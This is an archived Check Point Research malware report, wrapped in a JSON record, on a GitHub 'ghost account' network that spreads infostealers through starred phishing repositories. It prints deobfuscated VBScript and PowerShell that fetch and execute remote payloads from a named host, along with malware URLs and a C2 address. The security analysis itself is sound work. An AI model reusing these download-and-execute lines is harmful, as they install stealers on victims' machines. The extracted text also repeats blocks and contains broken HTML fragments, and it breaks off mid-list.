{ "id": "907c9678-67ef-48cb-8165-53453862a36d", "created_at": "2026-04-06T00:13:33.101593Z", "updated_at": "2026-04-10T03:37:33.268619Z", "deleted_at": null, "sha1_hash": "9360ea522e191d1c65670d2245d2d928b6b2c123", "title": "Stargazers Ghost Network - Check Point Research", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 244514, "plain_text": "Stargazers Ghost Network - Check Point Research\r\nBy antoniost@checkpoint.com\r\nPublished: 2024-07-24 · Archived: 2026-04-05 14:47:05 UTC\r\nResearch by: Antonis Terefos (@Tera0017)\r\nKey Points\r\nCheck Point Research identified a network of GitHub accounts (Stargazers Ghost Network) that distribute\r\nmalware or malicious links via phishing repositories. The network consists of multiple accounts that distribute\r\nmalicious links and malware and perform other actions such as starring, forking, and subscribing to malicious\r\nrepositories to make them appear legitimate.\r\nThis network is a highly sophisticated operation that acts as a Distribution as a Service (DaaS). It allows threat\r\nactors to share malicious links or malware for distribution through highly victim-oriented phishing repositories.\r\nCheck Point Research is tracking the threat group behind this service as Stargazer Goblin. The group provides,\r\noperates, and maintains the Stargazers Ghost Network and distributes malware and links via their GitHub Ghost\r\naccounts.\r\nThe network distributed all sorts of malware families, including Atlantida Stealer, Rhadamanthys, RisePro,\r\nLumma Stealer, and RedLine.\r\nOur latest calculations suggest that more than 3,000 active Ghost accounts are part of the network. Based on core\r\nGitHub Ghost accounts, we believe that the network began development or testing on a smaller scale for the first\r\ntime around August 2022.\r\nCheck Point Research discovered an advertiser in Dark-Web forums that provides the exact GitHub operation. The\r\nfirst advertisement was published on July 8, 2023, from an account created the previous day.\r\nBased on the monitored campaigns from mid-May to mid-June 2024, we estimate that Stargazer Goblin earned\r\napproximately $8,000. However, we believe that this amount is only a small fraction of what the actor made during\r\nthat period. The total amount during the operations’ lifespan is estimated to be approximately $100,000.\r\nStargazers Ghost Network appears to be only one part of the grand picture, with other Ghost accounts operating on\r\ndifferent platforms, constructing an even bigger Distribution as a Service universe.\r\nIntroduction\r\nThreat actors continually evolve their tactics to stay ahead of detection. Traditional methods of malware distribution via\r\nemails containing malicious attachments are heavily monitored, and the general public has become more aware of these\r\ntactics. Recently, Check Point Research observed threat actors using GitHub to achieve initial infections by utilizing new\r\nmethods. Previously, GitHub was used to distribute malicious software directly, with a malicious script downloading either\r\nraw encrypted scripting code or malicious executables.\r\nTheir tactics have now changed and evolved. Threat actors now operate a network of “Ghost” accounts that distribute\r\nmalware via malicious links on their repositories and encrypted archives as releases. This network not only distributes\r\nmalware but also provides various other activities that make these “Ghost” accounts appear as normal users, lending fake\r\nlegitimacy to their actions and the associated repositories. Check Point Research has observed these accounts forking,\r\nstarring, and watching malicious repositories, creating the illusion of a legitimate project and luring victims into\r\ndownloading the “advertised” content.\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 1 of 45\n\nIn a short period of monitoring, we discovered more than 2,200 malicious repositories where “Ghost” activities were\r\noccurring. During a campaign that took place around January 2024, the network distributed Atlantida stealer, a new\r\nmalware family that steals user credentials and cryptocurrency wallets along with other personal identifiable information\r\n(PII). This campaign was highly effective, as in less than 4 days, more than 1,300 victims were infected with Atlantida\r\nstealer. The malicious links to the GitHub repositories were possibly distributed via Discord channels. The repositories\r\ntargeted various types of victims who wanted to increase their followers on YouTube, Twitch, and Instagram and also\r\ncontained phishing templates for cracked software and other crypto-related activities.\r\nFigure 1 – Stargazer Ghost account.\r\nStargazers Ghost Network\r\nFor quite some time, GitHub has been utilized as a platform to distribute malicious code. Typically, repositories involved in\r\nsuch activities are newly created for specific campaigns and often stay online for long periods of time before being taken\r\ndown by GitHub or cleaned up by the threat actors. However, the content within these repositories usually does not suggest\r\nto a normal user that they should download and execute any of the hosted scripts or executables.\r\nThese types of attacks do not aim to lure users into directly downloading and executing payloads from the repository itself.\r\nInstead, they often involve scripts that download and execute payloads from seemingly legitimate websites or sources. This\r\napproach helps maintain the appearance of legitimacy while delivering malicious content to victims.\r\nThe Stargazers Ghost Network changes the game by providing a malicious repository where a malicious link is “starred”\r\nand “verified” by multiple GitHub accounts, thereby supporting its legitimacy.\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 2 of 45\n\nFigure 2 – Malicious GitHub account luring Twitch users.\r\nOften, the network utilizes identical tags and images but switches the “targeted audience” from one social media application\r\nor cracked software to another, but employing the same template. This suggests that the network operators automate these\r\nactivities, ensuring efficiency and scalability in their operations.\r\nFigure 3 – TikTok, YouTube, Twitch, Instagram, … with the same phishing template. \r\nThe README.md phishing template contains a malicious DOWNLOAD link to an external website. In some instances, this link\r\nredirects victims to the Releases section of a malicious GitHub repository instead. GitHub usually tries to detect malicious\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 3 of 45\n\nfiles or archives, though in many cases, the network uses password-protected archives that “hide” any malicious activities\r\nfrom scanning solutions.\r\nFigure 4 – Malware is distributed via password-encrypted archive releases.\r\nIn this scenario, the README.md contains a phishing download link that does not even redirect to the repository’s own\r\nreleases. Instead, it uses three GitHub Ghost accounts with different “responsibilities”:\r\n1. The first account serves the “phishing” repository template.\r\n2. The second account provides the “image” used for the phishing template.\r\n3. The third account serves malware as a password-protected archive in a Release.\r\nThis structure and operational method enable Stargazer Goblin to quickly “fix” any broken links that may occur due to\r\naccounts or repositories being banned for malicious activities. By distributing responsibilities across multiple accounts, the\r\nnetwork ensures flexibility in replacing its compromised components. This minimizes disruption to their operations,\r\nallowing them to swiftly adapt and continue their malicious activities on GitHub.\r\nThe third account, which serves the malware, is more likely to be detected. When this happens, GitHub bans the entire\r\naccount, repository, and associated releases. In response to such actions, Stargazer Goblin updates the first account’s\r\nphishing repository with a new link to a new active malicious release. This allows the network to continue operating with\r\nminimum losses when a malware-serving account is banned.\r\n# [Download](hxxps://github.com/soulkeeper500/soulkeeper500/releases/tag/lat)\r\n![trovos](hxxps://github.com/Minori702/Trovo-Toolkit/assets/154011813/98f626f2-0e25-4379-8902-801bd93892aa)\r\n### ViewBot is a tool designed to increase views and engagement on social platforms through an automated system. The\r\nsoftware product is designed to help promote content for both individual users and organizations looking to expand their\r\nonline influence. ViewBot utilizes modern social media API techniques to provide native and natural looking interactions.\r\n**Warning**: The use of bots to artificially boost social media statistics may be against the terms of use of the respective\r\nplatforms and may result in account lockout.\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 4 of 45\n\n- Support for multiple accounts to create organic traffic\r\n- Customize time intervals between \"views\" to simulate a real user\r\n- Simple and easy-to-use user interface\r\n- Support for proxy servers for anonymity and security\r\n- Work with social networks API\r\n- Proxy and anonymity of network requests\r\n- Web scraping and browser automation\r\n# [Download](hxxps://github.com/soulkeeper500/soulkeeper500/releases/tag/lat) ![trovos]\r\n(hxxps://github.com/Minori702/Trovo-Toolkit/assets/154011813/98f626f2-0e25-4379-8902-801bd93892aa) ### ViewBot is\r\na tool designed to increase views and engagement on social platforms through an automated system. The software product is\r\ndesigned to help promote content for both individual users and organizations looking to expand their online influence.\r\nViewBot utilizes modern social media API techniques to provide native and natural looking interactions. **Warning**: The\r\nuse of bots to artificially boost social media statistics may be against the terms of use of the respective platforms and may\r\nresult in account lockout. ## Features - Live viewers - Trovo Account creator - Chat bot - Follow bot - Shares - Mass report -\r\nSupport for multiple accounts to create organic traffic - Customize time intervals between \"views\" to simulate a real user -\r\nSimple and easy-to-use user interface - Support for proxy servers for anonymity and security ## Technologies - C\r\nprogramming language - Work with social networks API - Proxy and anonymity of network requests - Web scraping and\r\nbrowser automation\r\n# [Download](hxxps://github.com/soulkeeper500/soulkeeper500/releases/tag/lat)\r\n![trovos](hxxps://github.com/Minori702/Trovo-Toolkit/assets/154011813/98f626f2-0e25-4379-8902-801bd93892aa)\r\n### ViewBot is a tool designed to increase views and engagement on social platforms through an automated syste\r\n**Warning**: The use of bots to artificially boost social media statistics may be against the terms of use of\r\n## Features\r\n- Live viewers\r\n- Trovo Account creator\r\n- Chat bot\r\n- Follow bot\r\n- Shares\r\n- Mass report\r\n- Support for multiple accounts to create organic traffic\r\n- Customize time intervals between \"views\" to simulate a real user\r\n- Simple and easy-to-use user interface\r\n- Support for proxy servers for anonymity and security\r\n## Technologies\r\n- C programming language\r\n- Work with social networks API\r\n- Proxy and anonymity of network requests\r\n- Web scraping and browser automation\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 5 of 45\n\nTo an experienced eye, those repositories seem suspicious. What tipped us off was the high number of “stars” received by\r\neach one of those repositories. Further investigation revealed that the accounts responsible for starring/”liking” these\r\nmalicious repositories are integral to the same operation.\r\nFigure 6 – Stargazers of the malicious repository.\r\nWe observed a pattern across many of those Stargazer Ghost accounts that contain a repository with these characteristics:\r\n1. Repository name {username}1 .\r\n2. Two created files:\r\n1. The LICENSE of the project.\r\n2. The README.md file.\r\nFurther, the README.md contains as title the account name followed by “1” and text “1” .\r\nRepository: {username}1 , README.md content: # {username}1\\n1 .\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 6 of 45\n\nFigure 7 – GitHub Ghost accounts repository pattern.\r\nWhen we searched for that specific pattern, we discovered more than 1,100 repositories, which suggests the possibility of\r\nmore than 1,100 Ghost GitHub accounts that are part of this malicious Stargazers network.\r\nFigure 8 – README.md content pattern.\r\nEach Ghost-Stargazer within the Stargazers network is not limited to interacting with just one repository. Many of these\r\naccounts engage with multiple repositories, with a significant portion of them clearly involved in malicious activities.\r\nHowever, some other starred repositories appear just as suspicious, such as some WordPress-related and gaming mods tools.\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 7 of 45\n\nFigure 9 – Ghost account starred repositories.\r\nBased on the wide variety of projects and “interests” of those Ghost Stargazers—ranging from playing Counter-Strike to\r\nInstagram influencers to hacking and protecting machines with cracked anti-virus software—we were able to discover\r\nadditional malicious templates and further expand our collection of Ghost Stargazer accounts.\r\nFigure 10 – Game Cheat Repository.\r\nWhen malicious links redirect to GitHub releases, we’ve observed instances where associated accounts react by liking these\r\nmalicious releases. This behavior further reinforces the projects’ perceived “legitimacy” for unsuspecting users.\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 8 of 45\n\nFigure 11 – Release reactions.\r\nTo further separate the accounts and their actions, we discovered cases where other accounts that are also part of this\r\nnetwork made commits to malicious phishing README.md files.\r\nFigure 12 – Commit to another’s account project.\r\nIt’s not clear whether all those accounts were created by Stargazer Goblin for malicious purposes. As our research later\r\nsuggests, some of those accounts are compromised. This makes GitHub credentials obtained by infostealers valuable and,\r\nfurthermore, valuable enough to be sold and bought on underground markets.\r\n“Takedowns” \u0026 “Maintenance” Cycle\r\nThe multiple and different roles provide easy network maintenance as GitHub will not take down all accounts related to the\r\nrepository distributing the malware. This leaves the below accounts to continue their operations with minimal “damage”\r\nwhen actions are taken against the repository hosting the malware:\r\n1. Repository-Phishing accounts.\r\n2. Commit-Link accounts.\r\n3. Stargazer accounts.\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 9 of 45\n\n4. and any Other accounts.\r\nThe repository below buttercupserial/HubSpot-activation-by-nuat has been active since 2024-05-28 and has\r\nundergone 6 link changes. These 6 commits were made by\r\nbuttercupserial/168463497+buttercupserial@users.noreply.github.com , maintaining the attack chain by updating the\r\nmalware links.\r\nFigure 13 – Maintenance commits.\r\nCommit Date  Malware URL \r\n2024-05-\r\n28T10:21:50Z \r\nhxxps://github[.]com/bludmooncutie2/bludmooncutie2/releases/tag/latest \r\n2024-05-\r\n29T07:35:32Z \r\nhxxps://github[.]com/witch12138/test/releases/tag/lat \r\n2024-06-\r\n04T06:51:50Z \r\nhxxps://github[.]com/soulkeeper500/soulkeeper500/releases/tag/lat \r\n2024-06-\r\n06T07:40:15Z \r\nhxxps://github[.]com/xumuk71discoatoh/xumuk71discoatoh/releases/tag/new \r\n2024-06-\r\n10T02:09:27Z \r\nhxxps://goo[.]su/gisof1sda –\u003e\r\nhxxps://github[.]com/zigzagcharming643/zigzagcharming643/releases/tag/lat \r\n2024-06-\r\n10T09:13:52Z \r\nhxxps://github[.]com/xumuk71discoatoh/xumuk71discoatoh/releases/tag/new \r\nThe commits precisely modify the download link while keeping the remainder of the phishing template intact. \r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 10 of 45\n\nFigure 14 – Link change.\r\nThe latest link directs to a release featuring a password-protected archive Git_softwares_v1.1.2.7z which executes a GO\r\ndownloader Setup_v1.1.2.exe ( SHA256:98B7488B1A18CB0C5E360C06F0C94D19A5230B7B15D0616856354FB64929B388 )\r\nFigure 15 – Password-protected release.\r\nThe network’s maintenance and recovery process appears to be automatic, detecting banned accounts/repositories and fixing\r\nthem when necessary. Using different account roles ensures there is only minimal damage when and if GitHub takes action\r\nagainst accounts or repositories that violated its rules.\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 11 of 45\n\nFigure 16 – Stargazers Ghost Network Roles Overview.\r\nMost of the time, we observe that Repository and Stargazer accounts remain unaffected by bans and repository\r\ntakedowns, whereas Commit and Release accounts are typically banned once their malicious repositories are detected. It’s\r\ncommon to find Link-Repositories containing links to banned Release-Repositories. When this occurs, the Commit\r\naccount associated with the Link-Repository updates the malicious link with a new one.\r\nThe Commit account maintains a one-to-one relationship with all repositories under the Repository account. This means\r\nthe same Commit account can make multiple commits to repositories that belong to the same Repository account.\r\nFor typical campaigns, we usually observe the following requirements:\r\nOne Repository account, that is the owner of the phishing repository hosting the link to download.\r\nOne Commit account, which makes commits to the repositories belonging to the Repository account\r\nOne Release account, which creates and adds a malicious archive to the repository’s release and daily updates the\r\narchive to stay undetected for a longer period.\r\nX Stargazer accounts, which fork/star/like the repositories and releases.\r\nIn the above scenario, the Release account is usually the first to be banned. Then, the network operator creates a new\r\nmalicious link and updates all the Link Repositories using their related Commit Accounts. In conclusion, 2 accounts\r\n(Repository/Commit), plus X number of Stargazers, remain under the radar, while 1 Release account will possibly be\r\nbanned at some future point. These network roles managed to “bypass” in a way GitHub’s security measurements.\r\nCampaign I, Stargazers Ghost Network – Atlantida Stealer\r\nCheck Point Research analyzed a specific case in detail, revealing a GitHub campaign that resulted in Atlantida stealer.\r\nThe malicious GitHub link was possibly distributed via Discord, targeting Twitch users. The attack chain utilized malicious\r\nscripts hosted on compromised WordPress websites, making us wonder whether the suspicious GitHub repositories with\r\ncode for WordPress sites could also play a role.\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 12 of 45\n\nFigure 17 – Attack Chain Overview.\r\nThe victim receives a link to a GitHub phishing repository and clicks on the malicious download link, which directs them to\r\ndownload a script from a WordPress website. The contacted PHP file, index.php , checks the Referer header from the\r\nHTTP request to verify whether the victim came from GitHub and if the IP address belongs to the TOR network or any other\r\nblacklisted IP. After validation, the PHP file redirects the request to download.php .\r\nREADME.md content:\r\n## [DOWNLOAD](hxxps://carson.org.uk/gg1/index.php)\r\n![window](hXXps://github.com/arbipad/creator/assets/155444726/cf2bf4e1-650b-4bc4-b444-ae164efaa0f3)\r\n### ViewBot is a tool designed to increase views and engagement on social platforms through an automated system. The\r\nsoftware product is designed to help promote content for both individual users and organizations looking to expand their\r\nonline influence. ViewBot utilizes modern social media API techniques to provide native and natural looking interactions.\r\n**Warning**: The use of bots to artificially boost social media statistics may be against the terms of use of the respective\r\nplatforms and may result in account lockout.\r\n- Automate page/video views on popular social platforms\r\n- Support for multiple accounts to create organic traffic\r\n- Customize time intervals between \"views\" to simulate a real user\r\n- Functionality to enhance interaction with content (likes, comments, subscriptions)\r\n- Simple and easy-to-use user interface\r\n- Support for proxy servers for anonymity and security\r\n- Python programming language\r\n- Work with social networks API\r\n- Proxy and anonymity of network requests\r\n- Web scraping and browser automation\r\n[![License](hxxps://img.shields.io/badge/License-MIT-green)](LICENSE)\r\n## [DOWNLOAD](hxxps://carson.org.uk/gg1/index.php) ![window]\r\n(hXXps://github.com/arbipad/creator/assets/155444726/cf2bf4e1-650b-4bc4-b444-ae164efaa0f3) ### ViewBot is a tool\r\ndesigned to increase views and engagement on social platforms through an automated system. The software product is\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 13 of 45\n\ndesigned to help promote content for both individual users and organizations looking to expand their online influence.\nViewBot utilizes modern social media API techniques to provide native and natural looking interactions. **Warning**: The\nuse of bots to artificially boost social media statistics may be against the terms of use of the respective platforms and may\nresult in account lockout. ## Features - Automate page/video views on popular social platforms - Support for multiple\naccounts to create organic traffic - Customize time intervals between \"views\" to simulate a real user - Functionality to\nenhance interaction with content (likes, comments, subscriptions) - Simple and easy-to-use user interface - Support for\nproxy servers for anonymity and security ## Technologies - Python programming language - Work with social networks API\n- Proxy and anonymity of network requests - Web scraping and browser automation ## License [![License]\n(hxxps://img.shields.io/badge/License-MIT-green)](LICENSE)\n## [DOWNLOAD](hxxps://carson.org.uk/gg1/index.php)\n![window](hXXps://github.com/arbipad/creator/assets/155444726/cf2bf4e1-650b-4bc4-b444-ae164efaa0f3)\n### ViewBot is a tool designed to increase views and engagement on social platforms through an automated syste\n**Warning**: The use of bots to artificially boost social media statistics may be against the terms of use of\n## Features\n- Automate page/video views on popular social platforms\n- Support for multiple accounts to create organic traffic\n- Customize time intervals between \"views\" to simulate a real user\n- Functionality to enhance interaction with content (likes, comments, subscriptions)\n- Simple and easy-to-use user interface\n- Support for proxy servers for anonymity and security\n## Technologies\n- Python programming language\n- Work with social networks API\n- Proxy and anonymity of network requests\n- Web scraping and browser automation\n## License\n[![License](hxxps://img.shields.io/badge/License-MIT-green)](LICENSE)\nThe file downloaded is a .HTA file named Impress_V1.0.2.hta . This file contains a malicious iframe with a link\nexecuting the VB script code.\n[hxxp://astrahebz.com/te/g.mhtml](hxxp://astrahebz.com/te/g.mhtml)\n\n[Skip to main content](#content)\n\n[#](#)\n\n[About](.co/) https://research.checkpoint.com/2024/stargazers-ghost-network/\nPage 14 of 45\n\n[ass=\"s-popover--arrow\"\u003e [Public questions \u0026 answers [hxxp://astrahebz.com/te/g.mhtml](hxxp://astrahebz.com/te/g.mhtml) [Skip to main content](#content) [#](#) 1. [About](.co/) 2. [ass=\"s-popover--arrow\"\u003e 1. [Public questions \u0026 answers](.com/questions) 2. [hxxp://astrahebz.com/te/g.mhtml](hxxp://astrahebz.com/te/g.mhtml)](#)](.com/questions)](#)\n\n\u003cli class=\"m6\"\u003e\r\n \u003c/form\u003e\r\nThe VB script contains obfuscated code that executes PowerShell, which in turn runs remote code from another WordPress\r\nwebsite.\r\nThe VB De-obfuscated code:\r\n\u003cscript language=\"vBsCrIpT\"\u003e\r\nSet tired52 = GetObject('winmgmts:\\\\\\\\\\\\\\\\.\\\\\\\\root\\\\\\\\cimv2')\r\nSet shell29 = tired52.Get('Win32_Process')\r\nintReturn = shell29.Create('powershell irm hxxp://astrahebz.com/te/useless.txt | iex', Null, Null, intProcessID)\r\n\u003cscript language=\"vBsCrIpT\"\u003e Set tired52 = GetObject('winmgmts:\\\\\\\\\\\\\\\\.\\\\\\\\root\\\\\\\\cimv2') Set shell29 =\r\ntired52.Get('Win32_Process') intReturn = shell29.Create('powershell irm hxxp://astrahebz.com/te/useless.txt | iex', Null,\r\nNull, intProcessID) \u003c/script\u003e\r\n\u003cscript language=\"vBsCrIpT\"\u003e\r\n Set tired52 = GetObject('winmgmts:\\\\\\\\\\\\\\\\.\\\\\\\\root\\\\\\\\cimv2')\r\nSet shell29 = tired52.Get('Win32_Process')\r\nintReturn = shell29.Create('powershell irm hxxp://astrahebz.com/te/useless.txt | iex', Null, Null, int\r\n\u003c/script\u003e\r\nPowerShell code executing a .NET Injector.\r\n[DllImport(\"kernel32.dll\")]\r\npublic static extern IntPtr GetConsoleWindow();\r\n[DllImport(\"user32.dll\")]\r\npublic static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);\r\nAdd-Type -MemberDefinition $crop213 -Namespace \"crumble542543\" -Name \"culture6546\"\r\n$danger5646 = [crumble542543.culture6546]::GetConsoleWindow()\r\n[crumble542543.culture6546]::ShowWindow($danger5646, 0)\r\n[System.Reflection.Assembly]::Load((New-Object\r\nSystem.Net.WebClient).DownloadData(\"hxxps://astrahebz.com/te/tetete.bin\")).EntryPoint.Invoke($null, @($null))\r\n$crop213 = @' [DllImport(\"kernel32.dll\")] public static extern IntPtr GetConsoleWindow(); [DllImport(\"user32.dll\")] public\r\nstatic extern bool ShowWindow(IntPtr hWnd, int nCmdShow); '@ Add-Type -MemberDefinition $crop213 -Namespace\r\n\"crumble542543\" -Name \"culture6546\" $danger5646 = [crumble542543.culture6546]::GetConsoleWindow()\r\n[crumble542543.culture6546]::ShowWindow($danger5646, 0) [System.Reflection.Assembly]::Load((New-Object\r\nSystem.Net.WebClient).DownloadData(\"hxxps://astrahebz.com/te/tetete.bin\")).EntryPoint.Invoke($null, @($null))\r\n$crop213 = @'\r\n[DllImport(\"kernel32.dll\")]\r\npublic static extern IntPtr GetConsoleWindow();\r\n[DllImport(\"user32.dll\")]\r\npublic static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 16 of 45\n\n'@\r\nAdd-Type -MemberDefinition $crop213 -Namespace \"crumble542543\" -Name \"culture6546\"\r\n$danger5646 = [crumble542543.culture6546]::GetConsoleWindow()\r\n[crumble542543.culture6546]::ShowWindow($danger5646, 0)\r\n[System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData(\"hxxps://astrahebz.com/te/te\r\nThis .NET injector creates a process of regasm.exe and injects a shellcode. Finally, the malware dropped is Atlantida\r\nstealer with C\u0026C, 185.172.128.95 . The Stealer’s network communication is unencrypted plain text. The first connection\r\nsends IP information to 185.172.128.95:6666 , and in the next sends to 185.172.128.95:6665 an archive with stolen\r\ninformation Screenshot.jpeg , User Infromation.txt , Geo Information.txt , BrowserInfo.txt and for each Browser,\r\nthe Cookies/History/…\r\nFigure 20 – Bot’s first request.\r\nFigure 21 – Bot’s second request.\r\nThis campaign appears to have targeted victims who wanted to increase their “followers audience” in Twitch, Instagram,\r\nYouTube, Twitter, Trovo, and TikTok or use other tool-related features for Kick Chat, Telegram, Email, and Discord. Some\r\nof those malicious repositories distributing this template and phishing link were:\r\nglassmuysa/Htlx-Gen-Check\r\ngooles54/Rison-Trading-Bot\r\nvaliso0/Mail-Ac-Generator\r\narmoly/Discord-Bot armoly/Ds-Spm armoly/Email-Spm armoly/Tg-Spm armoly/Tg-SpmTg-Spm armoly/Twt-Spm\r\nbleblquck/FT-Vieww bleblquck/Kck-Vw bleblquck/Trv-Vws bleblquck/Tw-Vws dscvm/Discord-Vbot dscvm/Visoul-Grabber glassmuysa/Htlx-Gen-Check glassmuysa/Mail-Ac-Gen glassmuysa/TwT-Genr glassmuysa/Ytb-Dwnld\r\ngooles54/Rison-Raid-Bot gooles54/Rison-Trading-Bot gooles54/WPscn lzero121/TWT-vWS lzero121/Ytb-Vws\r\nlzero121/iNS-vWS lzero121/tK-vWS memekch/TWT-vWS memekch/Ytb-Vws memekch/iNS-vWS memekch/tK-vWS\r\nmemo1l/ChatGpt-Turbo sokratso/KMSpic-Ac valiso0/Mail-Ac-Generator valiso0/TwT-Gen valiso0/Ytb-Dwnld\r\narmoly/Discord-Bot\r\narmoly/Ds-Spm\r\narmoly/Email-Spm\r\narmoly/Tg-Spm\r\narmoly/Tg-SpmTg-Spm\r\narmoly/Twt-Spm\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 17 of 45\n\nbleblquck/FT-Vieww\r\nbleblquck/Kck-Vw\r\nbleblquck/Trv-Vws\r\nbleblquck/Tw-Vws\r\ndscvm/Discord-Vbot\r\ndscvm/Visoul-Grabber\r\nglassmuysa/Htlx-Gen-Check\r\nglassmuysa/Mail-Ac-Gen\r\nglassmuysa/TwT-Genr\r\nglassmuysa/Ytb-Dwnld\r\ngooles54/Rison-Raid-Bot\r\ngooles54/Rison-Trading-Bot\r\ngooles54/WPscn\r\nlzero121/TWT-vWS\r\nlzero121/Ytb-Vws\r\nlzero121/iNS-vWS\r\nlzero121/tK-vWS\r\nmemekch/TWT-vWS\r\nmemekch/Ytb-Vws\r\nmemekch/iNS-vWS\r\nmemekch/tK-vWS\r\nmemo1l/ChatGpt-Turbo\r\nsokratso/KMSpic-Ac\r\nvaliso0/Mail-Ac-Generator\r\nvaliso0/TwT-Gen\r\nvaliso0/Ytb-Dwnld\r\nAt the same time, more than 380 Stargazer Ghost accounts starred the ~30 repositories listed:\r\n0SPEED, 1shadowed, 2011mehdi, 60go, 7qwertyz, 9599853506, AUGUSCO, Ahmad7Salah, Akshitdangwal, Alexaldi,\r\nAlpha9310, AmirChidan9, AngelFx777, Aniketgamingx, ArsanyAbdalla, Aubskobbes5, Azang123, Badno2055,\r\nBahaabasuny0, Bazarasxx, BilalPasta,\r\nBoki309, BreakDee, BrokyBroke, Byronjr1, CanyonsEcho, Castle135798, Ch4r0oN, Chhunly844, Client, CoderXL,\r\nCoding, Cortjiani, D4RK4T, DSB1973, Danish24123, DavidGruz, Detroit16, Drakanobr, Emaynike, EneerOP,\r\nEricshalbe, Felixcyniiy, ForlornWindow46, Fox, Fox-King777, FranciscoFerreiraMaciel, GEOMETRYDASHGOD2010,\r\nGEOXKEVINO, GabrielFel, GabrielHorbach, GabrielHorbach,, Gabst7, Gaplaster3600, Ghadir450, Git, Gokumase,\r\nGonachapa, GurujiIsLive, Hassanjanjua, Haxrusxx,\r\nHousamelsherif, HuzaifaOmar, I1900sn, ImadOmer, Irsyan12, ItzzSzymusss, Ivrou66, Jamaldoskiy, Jaouadrobio, Jasonnoi,\r\nJayko235, Jayxxx14, Jessy55491, JhonataLim, Jockymaxi, JonathanLaraAguirre, Jtayyab007, KaizerEmre,\r\nKenderMendoza2, Kets357,\r\nKimi-, Kimi-Hsueh, Kle182, Kroz157, Krutik03, Kynarox, LAKAKKK, LEVITA44, Leandro1242, LeandroMirante,\r\nLebagordo, LeoBello00, Lyonnais, Lyonnais-2008, M-Asghar8atk, MHCYT, Madulahstaxks, MahmoudRede, Malek50,\r\nMallco14,,\r\nMarco22gt, Marcoscpires, Masud99Rana, MemeiNako, MenowJP, Miguelnogame, MohamedFayek2024, Mudjator,\r\nMuhammadBayuPriyatna, MuhammadRamzan123, Mustangth666, Nannydream, Nealhag, Neivolan, NexoCreeper,\r\nNikolas145, Nitanzw, NobiKazi, Oeslen, OrucMuhammed,\r\nOscarSalas19, Oscardoh63, Pantyshop, PasaBrava, Paul, Paul-CACHERA, Pedro42600, PlarixTools, PsandQs,\r\nROBOT2207, Rajveer8169, RefiElisa, Richard-Petty-Cru, RikuAAAAA, Riles923, RimuruNeto, RolandSandorNagy,\r\nRoyalLegend0304, Ruhan44, SaidDEV89,\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 18 of 45\n\nSaidSetup, SalmonButterzz, SatakeReal, Sebocha18, Severete, Sinbaiezechiel, SirRafael, Sourovnag, Sourovnag,,\r\nStrikerJapa, SusannBaldiviezo, Syedhamzaalishah, SzaSza2, TUNA-V, Technogun92, Thanakys, ThawHtooZin,\r\nThiagoSilva97, Tomasdionisio, TulioInnoveSistema,\r\nTumladen, Umair-Younus-1152, Urashtu, UsmanKhursheed06, Vavarea, Vickysris, Victor, VilaxDev00, Voracxty, WILWAP,\r\nWanmeng811, Warungkakek, WeFacaa, Winzume, YakultGo, Yinyang26, Yokeshraj2001, Youssef, Zecuss, Zekoahmed,\r\nZounzxx, a1nz0, aabdelhaleemm, absolutelie, achieversm, adixillua, advaman, alexplaysminecraft, aliii00, aminov1010,\r\nanaskhan785, anasskeda, aninha1kstro, asayahandatgr, asdasfazamazsdgfdsg, asdssfsd, asliyiilmaz, asmuiahmad,\r\nasmuiahmad,, atoras34,\r\naxeldolce0x, bgpx28, bleblquck, bodrumblock, brayan7897, brookandels, c0mroy, chatchai2165, dadinhokkk,\r\ndblancolascarez, deepak, deepak-gurjar07, deseplikon, dikiprsty, dnomesh, ecoplayer07, egoistpanel, elMarkoDev,\r\nepsilon201, f4h3m,\r\nfanerso, fatemehsotudeh, foxboyyyyyyy, gdois, georgi1122, guy1a2, hamudi1122, hereisue, hnghvfhcggf6699, hugotpdev,\r\nimazen59, imbored112, ismailsawadi, issabii, jahanzaibranaa1, jeremix14, jetunpatel1376, katarinadewi01, kb2030,\r\nkhaledbenz2009,\r\nkhanbhijan, khk6644, kitrock25, knowledgecase, kubisshi, kumar7679, kumarthar, kurosh, kxzpreto, kxzpreto,,\r\nlarryewakins, lawadas1231, lenegropu, lilmaku, llkkaaaslk, lokmanbaz, lucasmatheusdasilvadarosa, lucasodiniz,\r\nlucasstarley, lukeomatik,\r\nlyyzwjj, lzero121, m1a5g24, mady0602, mahlatsita, mailnhucac, malhotraraghav2003, malrazer, mansourazim,\r\nmarcosibottino, mariamlola, mateuscarestiato, mayilvaganam, medo659, memo20101, mertahxo, mgred22, milklove60122,\r\nmisterclima, mjsal,\r\nmohamednaeem109, monishgoal, motiaaa2, mougouta1, mrsinner56, mtalha7262, nachoooopxd, nadir0125, nathan,\r\nnendousbae, newbieRizal, nguyenthanhthuy140403, nikko6433, ninexslow, ninjas007, nizzamgrty, nomeshhost,\r\nnoobking1234, noobking1234,, notayessir,\r\nnotglwze, nunur66, oPaozinh0, oicu8lsd, openmare, pao2522, passcard2A, patadoeman222, phuriphatthongkuea,\r\npierre930523, potatoaim1313, prasanta1515, qaisar1234890, quavofinnest, rakuyoMo, ramdoni, ratihpurnamasar, raul2341,\r\nrazzm7, rbxrecoveryexploits,\r\nrcrobcarlos, rdiaz-002, reekid84, revelicate, 